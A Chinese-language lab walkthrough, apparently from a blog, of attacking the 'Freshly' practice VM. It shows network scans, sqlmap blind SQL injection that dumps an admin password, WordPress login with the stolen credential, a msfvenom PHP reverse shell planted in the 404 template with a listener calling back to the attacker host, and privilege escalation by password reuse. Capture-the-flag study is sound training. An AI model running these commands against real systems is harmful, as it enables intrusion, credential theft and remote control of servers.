Download: Freshly
Found
渗透靶机的第一步就是确定靶机的IP地址,只有确定了IP地址,才能进行下一步渗透。通过mac地址可判断出有可能的IP地址,再逐一进行判断。
主机发现
arp-scan 172.16.10.0/24
通过mac地址进行判断,发现可能的IP地址为172.16.10.150
和172.16.10.176
,通过前面网络安全从0到0.5之Zico 2靶机实战渗透测试中对172.16.10.176
IP进行的测试可以将其排除。
因此可以得到靶机IP为: 172.16.10.150
Collect
得到靶机IP后,便可以开始信息收集了。
对开放端口进行信息收集。
shell
nmap -sS -p- 172.16.10.150
对服务版本进行信息收集。
nmap -sV 172.16.10.150
发现该靶机开启了80
、443
、8080
端口,都是WEB服务。
Attack
使用浏览器访问http://172.16.10.150:80。
对网站进行url爆破。
dirb http://172.16.10.150
访问http://172.16.10.150/login.php,发现其为一个简单的登录框。
输入正常的账号密码进行测试,发现返回为0。
输入万能账号密码进行测试,发现返回为1。
由此可得,账号位置存在SQL注入,并且是布尔盲注,由于是靶机,直接Sqlmap 一把梭。
```
爆破数据库
sqlmap --url http://172.16.10.150/login.php --forms --batch --dbs
available databases [7]:
[] information_schema
[] login
[] mysql
[] performance_schema
[] phpmyadmin
[] users
[*] wordpress8080
爆破数据表
sqlmap --url http://172.16.10.150/login.php --forms --batch -D wordpress8080 --tables
Database: wordpress8080
[1 table]
+-------+
| users |
+-------+
爆破数据
sqlmap --url http://172.16.10.150/login.php --forms --batch -D wordpress8080 -T users --dump
Database: wordpress8080
Table: users
[1 entry]
+---------------------+----------+
| password | username |
+---------------------+----------+
| SuperSecretPassword | admin |
+---------------------+----------+
```
最终得到用户密码。
那我从wordpress8080
数据库得到的密码,用来登录wordpress
后台过分吗,不过分!!!
登入wordpress
后台 http://172.16.10.150:8080/wordpress/wp-login.php?redirect_to=http%3A%2F%2F172.16.10.150%3A8080%2Fwordpress%2Fwp-admin%2F&reauth=1
,很好,登录成功!
GET SHELL
进入后台后,就可以准备getshell了,直接在404页面写入反弹木马。
kali生成php反弹木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.10.123 LPORT=4498 -f raw
写入到
404.php
模板中
kali开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.10.123
lhost => 172.16.10.123
msf6 exploit(multi/handler) > set lport 4498
lport => 4498
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
*成功反弹shell*
Privilege Escalation
尝试使用前面爆破得到的admin密码进行登入。
成功。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论